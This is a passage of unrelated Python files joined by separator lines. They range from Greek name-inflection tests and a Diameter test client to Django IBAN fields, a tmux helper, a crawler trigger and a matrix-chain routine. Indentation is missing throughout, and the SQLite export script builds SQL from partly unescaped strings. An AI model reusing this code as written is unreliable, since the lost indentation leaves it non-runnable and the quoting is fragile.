# Testing extra exceptions
# Test error input
try:
VocativeMapper(extra_exceptions=123)
except Exception as ex:
assert isinstance(ex, AssertionError)
vm_exc = VocativeMapper(extra_exceptions={
'Ανακρέων': 'Ανακρέων'
})
assert vm_exc.as_case('Ανακρέων') == Generic.to_unicode('Ανακρέων')
vm_exc_upper_accent = VocativeMapper(extra_exceptions={
'Ανακρέων': 'Ανακρέων'
}, upper=True, accent=False)
assert vm_exc_upper_accent.as_case('Ανακρέων') == Generic.to_unicode('ΑΝΑΚΡΕΩΝ')
def test_genitive_mapper():
gm = GenitiveMapper()
# Testing basic usage
assert gm.as_case('Marsel') == Generic.to_unicode('Marsel')
assert gm.as_case('Μαρσέλ') == Generic.to_unicode('Μαρσέλ')
# Upper
gm_upper = GenitiveMapper(upper=True)
assert gm_upper.as_case('Μαρσέλ') == Generic.to_unicode('ΜΑΡΣΈΛ')
# Unaccented
gm_accent = GenitiveMapper(accent=False)
assert gm_accent.as_case('Μαρσέλ') == Generic.to_unicode('Μαρσελ')
# Testing vocative transformations
# Exceptions
assert gm.as_case('Φώτης') == Generic.to_unicode('Φώτη')
# Testing endings
assert gm.as_case('Αγάπιος') == Generic.to_unicode('Αγάπιου')
assert gm.as_case('Χαράλαμπος') == Generic.to_unicode('Χαράλαμπου')
assert gm.as_case('Πάτροκλος') == Generic.to_unicode('Πάτροκλου')
assert gm.as_case('Αγισίλαος') == Generic.to_unicode('Αγισίλαου')
assert gm.as_case('Αντίγονος') == Generic.to_unicode('Αντίγονου')
assert gm.as_case('Μίλτος') == Generic.to_unicode('Μίλτου')
assert gm.as_case('Νίκος') == Generic.to_unicode('Νίκου')
# Testing extra exceptions
# Test error input
try:
GenitiveMapper(extra_exceptions=123)
except Exception as ex:
assert isinstance(ex, AssertionError)
gm_exc = GenitiveMapper(extra_exceptions={
'Ανακρέων': 'Ανακρέοντα'
})
assert gm_exc.as_case('Ανακρέων') == Generic.to_unicode('Ανακρέοντα')
gm_exc_upper_accent = GenitiveMapper(extra_exceptions={
'Ανακρέων': 'Ανακρέοντα'
}, upper=True, accent=False)
assert gm_exc_upper_accent.as_case('Ανακρέων') == Generic.to_unicode('ΑΝΑΚΡΕΟΝΤΑ')
|
import os
import pandas as pd
import xml.etree.ElementTree as ET
from tqdm import tqdm
image_source = '/kaggle/input/siim-covid19-resized-to-1024px-jpg'
os.makedirs('lung_crop', exist_ok=True)
if __name__ == '__main__':
df = pd.read_csv('../../dataset/siim-covid19-detection/train_kfold.csv')
for fold in range(5):
tmp_df = df.loc[df['fold'] == fold]
meles = []
for _, row in tqdm(tmp_df.iterrows(), total=len(tmp_df)):
#image_path = f"{image_source}/train/{row['imageid']}.jpg"
ann_path = '../../dataset/lung_crop/labels/train/{}.xml'.format(row['imageid'])
yolo_ann_path = '../../dataset/lung_crop/labels/train/{}.txt'.format(row['imageid'])
tree = ET.parse(open(ann_path))
root = tree.getroot()
size = root.find('size')
width = int(size.find('width').text)
height = int(size.find('height').text)
cnt = 0
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
xmlbox = obj.find('bndbox')
x1, x2, y1, y2 = int(xmlbox.find('xmin').text), int(xmlbox.find('xmax').text), int(xmlbox.find('ymin').text), int(xmlbox.find('ymax').text)
cnt += 1
assert cnt == 1
xc = 0.5*(x1+x2)/width
yc = 0.5*(y1+y2)/height
w = (x2-x1)/width
h = (y2-y1)/height
with open(yolo_ann_path, 'w') as yolo_label_file:
yolo_label_file.write('0 {} {} {} {}\n'.format(xc, yc, w, h))
for fold in range(5):
val_df = df.loc[df['fold'] == fold].sample(frac=1).reset_index(drop=True)
train_df = df.loc[df['fold'] != fold].sample(frac=1).reset_index(drop=True)
with open("../../dataset/lung_crop/yolov5_train_fold{}.txt".format(fold), "w") as yv5_tf:
for _, row in train_df.iterrows():
#image_path = '../../dataset/lung_crop/images/train/{}.png'.format(row['imageid'])
image_path = f"{image_source}/train/{row['imageid']}.jpg"
yv5_tf.write(image_path + '\n')
with open("../../dataset/lung_crop/yolov5_valid_fold{}.txt".format(fold), "w") as yv5_vf:
for _, row in val_df.iterrows():
#image_path = '../../dataset/lung_crop/images/train/{}.png'.format(row['imageid'])
image_path = f"{image_source}/train/{row['imageid']}.jpg"
yv5_vf.write(image_path + '\n')
|
import prometheus.tftpd
'''
import prometheus.tftpd
prometheus.tftpd.tftpd()
to run:
set PYTHONPATH=p:\lanot\src\core\python
'''
prometheus.tftpd.tftp_client('greenhouse01.iot.oh.wsh.no', 'main.py', 'greenhouse01.py')
# prometheus.tftpd.tftp_client('greenhouse01.iot.oh.wsh.no', 'cacert.pem')
# prometheus.tftpd.tftp_client('greenhouse01.iot.oh.wsh.no', 'cert.pem')
# prometheus.tftpd.tftp_client('greenhouse01.iot.oh.wsh.no', 'key.pem')
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from internationalflavor.iban.validators import BICCleaner, IBANCleaner
from .forms import IBANFormField
from .data import IBAN_MAX_LENGTH
from internationalflavor.iban.forms import BICFormField
from .validators import IBANValidator, BICValidator
class IBANField(models.CharField):
"""A model field that applies the :class:`.validators.IBANValidator` and is represented by a
:class:`.forms.IBANFormField`. The arguments are equal to those of the validator.
Example:
.. code-block:: python
from django.db import models
from internationalflavor.iban import IBANField
class MyModel(models.Model):
iban = IBANField(countries=['NL', 'BE'])
This field is an extension of a CharField.
"""
description = _('An International Bank Account Number')
def __init__(self, countries=None, exclude=None, sepa_only=False, accept_experimental=False, *args, **kwargs):
self.countries = countries
self.exclude = exclude
self.sepa_only = sepa_only
self.accept_experimental = accept_experimental
kwargs.setdefault('max_length', IBAN_MAX_LENGTH)
super(IBANField, self).__init__(*args, **kwargs)
self.validators.append(IBANValidator(countries=countries, exclude=exclude, # pylint: disable=E1101
accept_experimental=accept_experimental, sepa_only=sepa_only))
def deconstruct(self):
name, path, args, kwargs = super(IBANField, self).deconstruct()
if self.countries:
kwargs['countries'] = self.countries
if self.exclude:
kwargs['exclude'] = self.exclude
if self.sepa_only:
kwargs['sepa_only'] = self.sepa_only
if self.accept_experimental:
kwargs['accept_experimental'] = self.accept_experimental
if 'max_length' in kwargs and kwargs["max_length"] == IBAN_MAX_LENGTH:
del kwargs["max_length"]
return name, path, args, kwargs
def to_python(self, value):
value = super(IBANField, self).to_python(value)
if value is not None:
return IBANCleaner()(value)
return value
def formfield(self, **kwargs):
defaults = {'form_class': IBANFormField}
defaults.update(kwargs)
return super(IBANField, self).formfield(**defaults)
class BICField(models.CharField):
"""A model field that applies the :class:`.validators.BICValidator` and is represented by a
:class:`.forms.BICFormField`.
This field is an extension of a CharField.
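Example (an illustrative sketch, mirroring the IBANField example above):
.. code-block:: python
from django.db import models
from internationalflavor.iban import BICField
class MyModel(models.Model):
bic = BICField()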
"""
description = _('An International Bank Code')
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 11)
super(BICField, self).__init__(*args, **kwargs)
self.validators.append(BICValidator()) # pylint: disable=E1101
def deconstruct(self):
name, path, args, kwargs = super(BICField, self).deconstruct()
if 'max_length' in kwargs and kwargs["max_length"] == 11:
del kwargs["max_length"]
return name, path, args, kwargs
def to_python(self, value):
value = super(BICField, self).to_python(value)
if value is not None:
return BICCleaner()(value)
return value
def formfield(self, **kwargs):
defaults = {'form_class': BICFormField}
defaults.update(kwargs)
return super(BICField, self).formfield(**defaults)
|
import libtmux
def ensure_server() -> libtmux.Server:
'''
Either create new or return existing server
'''
return libtmux.Server()
def spawn_session(name: str, kubeconfig_location: str, server: libtmux.Server):
if server.has_session(name):
return
else:
session = server.new_session(name)
session.set_environment("KUBECONFIG", kubeconfig_location)
# the new_session will create default window and pane which will not contain KUBECONFIG, add manually
session.attached_window.attached_pane.send_keys("export KUBECONFIG={}".format(kubeconfig_location))
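# A minimal usage sketch (the session name and kubeconfig path are illustrative assumptions):
# server = ensure_server()
# spawn_session("dev-cluster", "/home/user/.kube/config", server)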
|
import unittest
from unittest import TestCase
from db_credentials import DBCredentials
class TestDBCredentials( TestCase ):
def setUp( self ):
self.creds = DBCredentials.DBCredentials()
self.creds.loadFile( '/Users/damonsauve/git/db-credentials/db_credentials/test/test.creds' )
self.test_creds = {
'host' : 'test_database',
'port' : '1521',
'username' : 'test_user',
'password' : 'test_password',
'database' : 'test_database',
}
def test_get_host( self ):
self.assertEqual( self.creds.get_host(), self.test_creds['host'] )
def test_get_port( self ):
self.assertEqual( self.creds.get_port(), self.test_creds['port'] )
def test_get_username( self ):
self.assertEqual( self.creds.get_username(), self.test_creds['username'] )
def test_get_password( self ):
self.assertEqual( self.creds.get_password(), self.test_creds['password'] )
def test_get_database( self ):
self.assertEqual( self.creds.get_database(), self.test_creds['database'] )
if __name__ == "__main__":
unittest.main()
|
#!/usr/bin/env python
##################################################################
# Copyright (c) 2012, Sergej Srepfler <sergej.srepfler@gmail.com>
# February 2012 - March 2012
# Version 0.2.6, Last change on Mar 20, 2012
# This software is distributed under the terms of BSD license.
##################################################################
#Next two lines are to include parent directory for testing
import sys
sys.path.append("..")
# Remove them normally
# HSS client - MAR/MAA for diameter EAP-AKA client
from libDiameter import *
import eap
import datetime
import time
def create_CER():
# Let's build CER
CER_avps=[]
CER_avps.append(encodeAVP("Origin-Host", ORIGIN_HOST))
CER_avps.append(encodeAVP("Origin-Realm", ORIGIN_REALM))
CER_avps.append(encodeAVP("Vendor-Id", 28458))
CER_avps.append(encodeAVP("Origin-State-Id", 1))
CER_avps.append(encodeAVP("Supported-Vendor-Id", 10415))
CER_avps.append(encodeAVP("Auth-Application-Id", 0xFFFFFFFF))
CER_avps.append(encodeAVP("Acct-Application-Id", 0xFFFFFFFF))
# Create message header (empty)
CER=HDRItem()
# Set command code
CER.cmd=dictCOMMANDname2code("Capabilities-Exchange")
# Set Hop-by-Hop and End-to-End
initializeHops(CER)
# Add AVPs to header and calculate remaining fields
msg=createReq(CER,CER_avps)
# msg now contains CER Request as hex string
return msg
def create_SAR():
# Let's build Server-AssignmentRequest
REQ_avps=[]
REQ_avps.append(encodeAVP("Session-Id", SESSION_ID))
REQ_avps.append(encodeAVP("Destination-Realm", DEST_REALM))
REQ_avps.append(encodeAVP("User-Name", IDENTITY))
# 5 - DEREGISTRATION
REQ_avps.append(encodeAVP("Server-Assignment-Type", 5))
# 1 - NO_STATE_MAINTAINED
REQ_avps.append(encodeAVP("Auth-Session-State", 1))
# Grouped AVPs are encoded like this
REQ_avps.append(encodeAVP("Vendor-Specific-Application-Id",[
encodeAVP("Vendor-Id",dictVENDORid2code('TGPP')),
encodeAVP("Auth-Application-Id",APPLICATION_ID)]))
REQ_avps.append(encodeAVP("Origin-Host", ORIGIN_HOST))
REQ_avps.append(encodeAVP("Origin-Realm", ORIGIN_REALM))
# Create message header (empty)
SAR=HDRItem()
# Set command code
SAR.cmd=dictCOMMANDname2code("Server-Assignment")
# Set Application-id
SAR.appId=APPLICATION_ID
# Set Hop-by-Hop and End-to-End
initializeHops(SAR)
# Set Proxyable flag
setFlags(SAR,DIAMETER_HDR_PROXIABLE)
# Add AVPs to header and calculate remaining fields
ret=createReq(SAR,REQ_avps)
# ret now contains SAR Request as hex string
return ret
def create_PPA(H):
# Let's build Push-Profile Answer
# We need Session-Id from Request
PPR_avps=splitMsgAVPs(H.msg)
sesID=findAVP("Session-Id",PPR_avps)
PPA_avps=[]
PPA_avps.append(encodeAVP("Origin-Host", ORIGIN_HOST))
PPA_avps.append(encodeAVP("Origin-Realm", ORIGIN_REALM))
PPA_avps.append(encodeAVP("Session-Id", sesID))
PPA_avps.append(encodeAVP("Result-Code", 2001)) #DIAMETER_SUCCESS 2001
# Create message header (empty)
PPA=HDRItem()
# Set command code
PPA.cmd=H.cmd
# Set Application-id
PPA.appId=H.appId
# Set Hop-by-Hop and End-to-End from request
PPA.HopByHop=H.HopByHop
PPA.EndToEnd=H.EndToEnd
# Add AVPs to header and calculate remaining fields
ret=createRes(PPA,PPA_avps)
# ret now contains PPA Response as hex string
return ret
def create_Session_Id():
#The Session-Id MUST be globally and eternally unique
#<DiameterIdentity>;<high 32 bits>;<low 32 bits>[;<optional value>]
now=datetime.datetime.now()
ret=ORIGIN_HOST+";"
ret=ret+str(now.year)[2:4]+"%02d"%now.month+"%02d"%now.day
ret=ret+"%02d"%now.hour+"%02d"%now.minute+";"
ret=ret+"%02d"%now.second+str(now.microsecond)+";"
ret=ret+IDENTITY[2:16]
return ret
if __name__ == "__main__":
#logging.basicConfig(level=logging.DEBUG)
LoadDictionary("../dictDiameter.xml")
eap.LoadEAPDictionary("../dictEAP.xml")
################
HOST="10.14.5.148"
PORT=3868
ORIGIN_HOST="client.test.com"
ORIGIN_REALM="test.com"
IDENTITY="262022503508143"
#ETYPE="EAP-SIM"
ETYPE="EAP-AKA"
#ETYPE="EAP-AKA'"
if ETYPE=="EAP-SIM":
# 3GPP SWx=16777265 STa=16777250 S6b=16777272 Wx=16777219
APPLICATION_ID=16777219
else:
APPLICATION_ID=16777265
# Let's assume that my Diameter messages will fit into 4k
MSG_SIZE=4096
# Connect to server
Conn=Connect(HOST,PORT)
###########################################################
# Let's build CER
msg=create_CER()
# msg now contains CER Request as hex string
logging.debug("+"*30)
# send data
Conn.send(msg.decode("hex"))
# Receive response
received = Conn.recv(MSG_SIZE)
# split header and AVPs
CEA=HDRItem()
stripHdr(CEA,received.encode("hex"))
# From CEA we needed Destination-Host and Destination-Realm
Capabilities_avps=splitMsgAVPs(CEA.msg)
print Capabilities_avps
DEST_HOST=findAVP("Origin-Host",Capabilities_avps)
DEST_REALM=findAVP("Origin-Realm",Capabilities_avps)
###########################################################
# Receive response
received = Conn.recv(MSG_SIZE)
print "Received PPR",received.encode("hex")
PPR=HDRItem()
stripHdr(PPR,received.encode("hex"))
###########################################################
SESSION_ID=create_Session_Id()
msg=create_SAR()
# msg now contains SAR as hex string
logging.debug("+"*30)
# send data
Conn.send(msg.decode("hex"))
# Receive response
received = Conn.recv(MSG_SIZE)
###########################################################
msg=create_PPA(PPR)
# msg now contains STA as hex string
logging.debug("+"*30)
# send data
Conn.send(msg.decode("hex"))
# And close the connection
Conn.close()
|
#!/usr/bin/python3
# Converts nsi_presets.json to a sqlite db
# Not currently used, but maybe in the future when NSI is unbearably large
#
# Output can be piped to sqlite3 to create the database
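# Example invocation (the script and database file names are assumptions for illustration):
# python3 nsi_presets_to_sqlite.py | sqlite3 nsi_presets.db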
import json
file = open("nsi_presets.json")
data = json.load(file)
print("create table brands(id INTEGER, identifier TEXT, name TEXT, icon TEXT, geometry INTEGER, matchScore REAL, imageURL TEXT );")
print("create table locationSet(id INTEGER, location TEXT, include INTEGER, foreign key (id) references brands(id));")
print("create table terms(id INTEGER, term TEXT, foreign key (id) references brands(id));")
print("create table tags(id INTEGER, key TEXT, value TEXT, foreign key (id) references brands(id));")
print("create table addTags(id INTEGER, key TEXT, value TEXT, foreign key (id) references brands(id));")
geom_map={
"point": 1,
"line": 2,
"vertex": 4,
"area": 8,
"relation": 16
}
location_map={
"include": 1,
"exclude": 0
}
id = -1
presets = data["presets"]
for identifier in presets:
id += 1
dict = presets[identifier]
name = dict["name"]
icon = dict["icon"]
geom = 0
for g in dict["geometry"]:
geom += geom_map[g]
matchScore = dict["matchScore"]
imageURL = dict.get("imageURL")
identifier = ""
imageURL = ""
print(f'insert into brands(id,identifier,name,icon,geometry,matchScore,imageURL) values ({id},"{identifier}","{name}","{icon}","{geom}","{matchScore}","{imageURL}");')
tags = dict["tags"]
for key in tags:
value = tags[key].replace('"','""')
print(f'insert into tags(id,key,value) values ("{id}","{key}","{value}");')
addTags = dict["addTags"]
for key in addTags:
value = addTags[key].replace('"','""')
print(f'insert into addTags(id,key,value) values ("{id}","{key}","{value}");')
terms = dict["terms"]
for term in terms:
term = term.replace('"','""')
print(f'insert into terms(id,term) values ("{id}","{term}");')
locationSet = dict["locationSet"]
for loc in locationSet:
include = location_map[loc]
for code in locationSet[loc]:
print(f'insert into locationSet(id,location,include) values ("{id}","{code}",{include});')
|
#!/usr/bin/python
from mod_pywebsocket import msgutil
import time
import urllib
def web_socket_do_extra_handshake(request):
msgutil._write(request, 'x')
time.sleep(2)
def web_socket_transfer_data(request):
msgutil._write(request, urllib.unquote(request.ws_location.split('?', 1)[1]).decode("string-escape"))
time.sleep(2)
|
import mgear.core.pyqt as gqt
from mgear.vendor.Qt import QtCore, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(344, 635)
self.verticalLayout_3 = QtWidgets.QVBoxLayout(Form)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.tools_groupBox = QtWidgets.QGroupBox(Form)
self.tools_groupBox.setObjectName("tools_groupBox")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tools_groupBox)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.settings_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.settings_pushButton.setObjectName("settings_pushButton")
self.verticalLayout_2.addWidget(self.settings_pushButton)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.duplicate_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.duplicate_pushButton.setObjectName("duplicate_pushButton")
self.horizontalLayout.addWidget(self.duplicate_pushButton)
self.dupSym_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.dupSym_pushButton.setObjectName("dupSym_pushButton")
self.horizontalLayout.addWidget(self.dupSym_pushButton)
self.extrCtl_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.extrCtl_pushButton.setObjectName("extrCtl_pushButton")
self.horizontalLayout.addWidget(self.extrCtl_pushButton)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.build_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.build_pushButton.setObjectName("build_pushButton")
self.verticalLayout_2.addWidget(self.build_pushButton)
self.verticalLayout_3.addWidget(self.tools_groupBox)
self.list_groupBox = QtWidgets.QGroupBox(Form)
self.list_groupBox.setObjectName("list_groupBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.list_groupBox)
self.verticalLayout.setObjectName("verticalLayout")
self.search_lineEdit = QtWidgets.QLineEdit(self.list_groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.search_lineEdit.sizePolicy().hasHeightForWidth())
self.search_lineEdit.setSizePolicy(sizePolicy)
self.search_lineEdit.setObjectName("search_lineEdit")
self.verticalLayout.addWidget(self.search_lineEdit)
self.splitter = QtWidgets.QSplitter(self.list_groupBox)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.component_listView = DragQListView(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.component_listView.sizePolicy().hasHeightForWidth())
self.component_listView.setSizePolicy(sizePolicy)
self.component_listView.setMinimumSize(QtCore.QSize(0, 0))
self.component_listView.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.component_listView.setProperty("showDropIndicator", False)
self.component_listView.setDragDropMode(QtWidgets.QAbstractItemView.NoDragDrop)
self.component_listView.setDefaultDropAction(QtCore.Qt.CopyAction)
self.component_listView.setAlternatingRowColors(True)
self.component_listView.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.component_listView.setObjectName("component_listView")
self.info_plainTextEdit = QtWidgets.QPlainTextEdit(self.splitter)
self.info_plainTextEdit.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.info_plainTextEdit.sizePolicy().hasHeightForWidth())
self.info_plainTextEdit.setSizePolicy(sizePolicy)
self.info_plainTextEdit.setMinimumSize(QtCore.QSize(0, 50))
self.info_plainTextEdit.setMaximumSize(QtCore.QSize(16777215, 100))
self.info_plainTextEdit.setBaseSize(QtCore.QSize(0, 50))
self.info_plainTextEdit.setUndoRedoEnabled(False)
self.info_plainTextEdit.setReadOnly(True)
self.info_plainTextEdit.setPlainText("")
self.info_plainTextEdit.setObjectName("info_plainTextEdit")
self.verticalLayout.addWidget(self.splitter)
self.draw_pushButton = QtWidgets.QPushButton(self.list_groupBox)
self.draw_pushButton.setObjectName("draw_pushButton")
self.verticalLayout.addWidget(self.draw_pushButton)
self.showUI_checkBox = QtWidgets.QCheckBox(self.list_groupBox)
self.showUI_checkBox.setChecked(True)
self.showUI_checkBox.setObjectName("showUI_checkBox")
self.verticalLayout.addWidget(self.showUI_checkBox)
self.verticalLayout_3.addWidget(self.list_groupBox)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(gqt.fakeTranslate("Form", "Form", None, -1))
self.tools_groupBox.setTitle(gqt.fakeTranslate("Form", "Guide Tools", None, -1))
self.settings_pushButton.setWhatsThis(gqt.fakeTranslate("Form", "<html><head/><body><p>Open Component/Guide root settings window.</p></body></html>", None, -1))
self.settings_pushButton.setText(gqt.fakeTranslate("Form", "Settings", None, -1))
self.duplicate_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Duplicate selected component.</p></body></html>", None, -1))
self.duplicate_pushButton.setText(gqt.fakeTranslate("Form", "Duplicate", None, -1))
self.dupSym_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Duplicate symmetrical selected component.</p></body></html>", None, -1))
self.dupSym_pushButton.setText(gqt.fakeTranslate("Form", "Dupl. Sym.", None, -1))
self.extrCtl_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Extract Selected Controls and store as control Buffer.</p></body></html>", None, -1))
self.extrCtl_pushButton.setText(gqt.fakeTranslate("Form", "Extr. Ctl.", None, -1))
self.build_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Build rig from selection</p></body></html>", None, -1))
self.build_pushButton.setWhatsThis(gqt.fakeTranslate("Form", "<html><head/><body><p>Open Component/Guide root settings window.</p></body></html>", None, -1))
self.build_pushButton.setText(gqt.fakeTranslate("Form", "Build From Selection", None, -1))
self.list_groupBox.setTitle(gqt.fakeTranslate("Form", "Component List", None, -1))
self.draw_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Draw selected component.</p></body></html>", None, -1))
self.draw_pushButton.setText(gqt.fakeTranslate("Form", "Draw Component", None, -1))
self.showUI_checkBox.setText(gqt.fakeTranslate("Form", "Show Setting After Create New Component.", None, -1))
from mgear.core.widgets import DragQListView
|
import os, pytest
from pathlib import Path
from ..fast import FAST
@pytest.mark.parametrize("inputs, outputs", [])
def test_FAST(test_data, inputs, outputs):
in_file = Path(test_data) / "test.nii.gz"
if inputs is None:
inputs = {}
for key, val in inputs.items():
try:
inputs[key] = eval(val)
except:
pass
task = FAST(in_file=in_file, **inputs)
assert set(task.generated_output_names) == set(
["return_code", "stdout", "stderr"] + outputs
)
@pytest.mark.parametrize("inputs, error", [(None, "AttributeError")])
def test_FAST_exception(test_data, inputs, error):
in_file = Path(test_data) / "test.nii.gz"
if inputs is None:
inputs = {}
for key, val in inputs.items():
try:
inputs[key] = eval(val)
except:
pass
task = FAST(in_file=in_file, **inputs)
with pytest.raises(eval(error)):
task.generated_output_names
|
import rospy
import tf2_ros as tf
import queue
from threading import Thread
class TestResult:
def __init__(self, name, msg):
self.success = False
self.msg = msg
self.name = name
self.timed_out = False
def set_result(self, value):
self.success = value
def print(self):
text = ": " + self.msg if not self.success else ""
print_method = rospy.loginfo if self.success else rospy.logerr
success_text = self.success if not self.timed_out else "Failed: TimedOut"
print_method(f" Test {self.name}: {success_text} {text}")
def report_timedout(self):
self.timed_out = True
class TestClass:
def __init__(self, name, requires_tf):
rospy.init_node(name)
self.test_idx = 0
self.test_results = []
self.test_handles = []
self.is_finished = False
self.test_data = {}
self.queue = queue.Queue()
if requires_tf:
#tf setup
self.tf_Buffer = tf.Buffer(rospy.Duration(10))
self.tf_listener = tf.TransformListener(self.tf_Buffer)
self.tf_broadcaster = tf.TransformBroadcaster()
self.tf_static_broadcaster = tf.StaticTransformBroadcaster()
def dispatch_to_main_thread(self, func):
self.queue.put(func)
# Adds a delegate/handle to the test list, which will be called as soon as
# TestClass.advance_test() is called
def register_test_handle(self, name, msg, handle):
self.test_handles.append(handle)
self.test_results.append(TestResult(name, msg))
self.test_data[len(self.test_handles)-1] = {}
def get_test_idx(self, handle):
return self.test_handles.index(handle)
# Starts the next test
def advance_test(self, index, current_success):
if index != self.test_idx:
return
self.test_results[self.test_idx].set_result(current_success)
if len(self.test_results) > self.test_idx + 1:
self.test_idx += 1
# Start the next test
self.run_next_test()
else:
# Log the test results to the screen
self.test_idx = 999
self.report_tests_finished()
def run_next_test(self):
rospy.loginfo(f"Starting Test {self.test_idx}: {self.test_results[self.test_idx].name}")
self.dispatch_to_main_thread(self.test_handles[self.test_idx])
idx = self.test_idx
thread = Thread(target = self.wait_for_timeout, args=[idx])
thread.start()
def wait_for_timeout(self, idx):
rospy.sleep(3)
if self.test_idx == idx:
self.test_results[idx].report_timedout()
self.advance_test(idx, False)
# Reports the results of this test
def report_tests_finished(self):
rospy.loginfo("Tests are finished. Now printing results: ")
for result in self.test_results:
result.print()
if any([not result.success for result in self.test_results]):
rospy.logerr("At least one test failed!")
self.is_finished = True
# Waits for the self.is_finished field to return True and then lets the node die
def run(self):
if len(self.test_handles) > 0:
self.run_next_test()
while not self.is_finished:
try:
callback = self.queue.get(False) #doesn't block
thread = Thread(target=callback)
thread.start()
except queue.Empty:
pass
rospy.sleep(0.1)
else:
rospy.loginfo("This TestNode did not register any tests")
|
import unittest
from . import test_column
from . import test_map_mooring
from . import test_loading
from . import test_substructure
from . import test_floating
def suite():
suite = unittest.TestSuite( (test_column.suite(),
test_map_mooring.suite(),
test_loading.suite(),
test_substructure.suite(),
test_floating.suite()
) )
return suite
if __name__ == '__main__':
unittest.TextTestRunner().run(suite())
|
n1 = int(input('Enter a value: '))
n2 = int(input('Enter another value: '))
operacao = 0
print('Choose an option:\n1. Add\n2. Multiply\n3. Largest\n4. New numbers\n5. Exit the program')
while operacao != 5:
operacao = int(input())
if operacao == 1:
print('{} + {} = {}'.format(n1, n2, n1 + n2))
elif operacao == 2:
print('{} x {} = {}'.format(n1, n2, n1 * n2))
elif operacao == 3:
if n1 > n2:
print('{} is the largest value.'.format(n1))
else:
print('{} is the largest value.'.format(n2))
elif operacao == 4:
n1 = int(input('Enter a value: '))
n2 = int(input('Enter another value: '))
print('{:=^40}'.format('END'))
|
import config
import urllib.parse
import datetime
import traceback
import time
# import tqdm
import zlib
import settings
import sqlalchemy.exc
from sqlalchemy import or_
from sqlalchemy import and_
from sqlalchemy import func
from sqlalchemy import text
import common.database as dbm
import RawArchiver.RawActiveModules
import RawArchiver.TimedTriggers.TriggerBase
import RawArchiver.misc as raw_misc
import RawArchiver.RawUrlUpserter
class RollingRawUrlStartTrigger(RawArchiver.TimedTriggers.TriggerBase.TriggerBaseClass):
pluginName = "RollingRewalk Trigger"
loggerPath = 'Main.RollingRawRewalker'
def retrigger_urls(self, url_list):
self.log.info("Retrigging %s urls", len(url_list))
with self.db.session_context(override_timeout_ms=1000*60*15) as sess:
for url in url_list:
epoch = raw_misc.get_epoch_for_url(url)
nl = urllib.parse.urlsplit(url).netloc
linksd = [{
'url' : url,
'starturl' : url,
'netloc' : nl,
'distance' : dbm.DB_DEFAULT_DIST,
'priority' : dbm.DB_MED_PRIORITY,
'state' : "new",
'addtime' : datetime.datetime.now(),
# Don't retrigger unless the ignore time has elapsed.
'epoch' : raw_misc.get_epoch_for_url(url, nl),
}]
RawArchiver.RawUrlUpserter.do_link_batch_update_sess(self.log, sess, linksd)
row = sess.query(self.db.RawWebPages) \
.filter(self.db.RawWebPages.url == url) \
.scalar()
print(row, row.state, row.epoch)
def go(self):
print("Startup?")
self.log.info("Rolling re-trigger of starting URLs.")
starturls = []
for module in RawArchiver.RawActiveModules.ACTIVE_MODULES:
for url in module.get_start_urls():
nl = urllib.parse.urlsplit(url).netloc
self.log.info("Interval: %s, netloc: %s", module.rewalk_interval, nl)
starturls.append(url)
self.retrigger_urls(starturls)
if __name__ == "__main__":
import logSetup
logSetup.initLogging()
run = RollingRawUrlStartTrigger()
run.go()
# run._go()
|
'''
Matrix Chain Multiplication
Given a chain of matrices A1, A2, A3, ..., An, figure out the most efficient way to multiply them,
i.e. determine where to place parentheses so that the number of scalar multiplications is minimized.
You are given an array p[] of size n + 1; the dimension of matrix Ai is p[i - 1] x p[i].
Find the minimum number of multiplications needed to multiply the chain.
'''
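# Illustrative example (hypothetical input, not from the problem statement): for p = [10, 20, 30, 40]
# the chain is A1 (10x20), A2 (20x30), A3 (30x40); (A1*A2)*A3 costs 10*20*30 + 10*30*40 = 18000
# scalar multiplications while A1*(A2*A3) costs 20*30*40 + 10*20*40 = 32000, so the program prints
# 18000 when stdin is "3" followed by "10 20 30 40".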
import sys
from sys import stdin
def matrixChainMemoised(p, i, j):
if(i == j):
return 0
if(dp[i][j] != -1):
return dp[i][j]
dp[i][j] = sys.maxsize
for k in range(i,j):
dp[i][j] = min(dp[i][j], matrixChainMemoised(p, i, k) + matrixChainMemoised(p, k + 1, j)+ p[i - 1] * p[k] * p[j])
return dp[i][j]
def mcm(p,n):
i = 1
j = n - 1
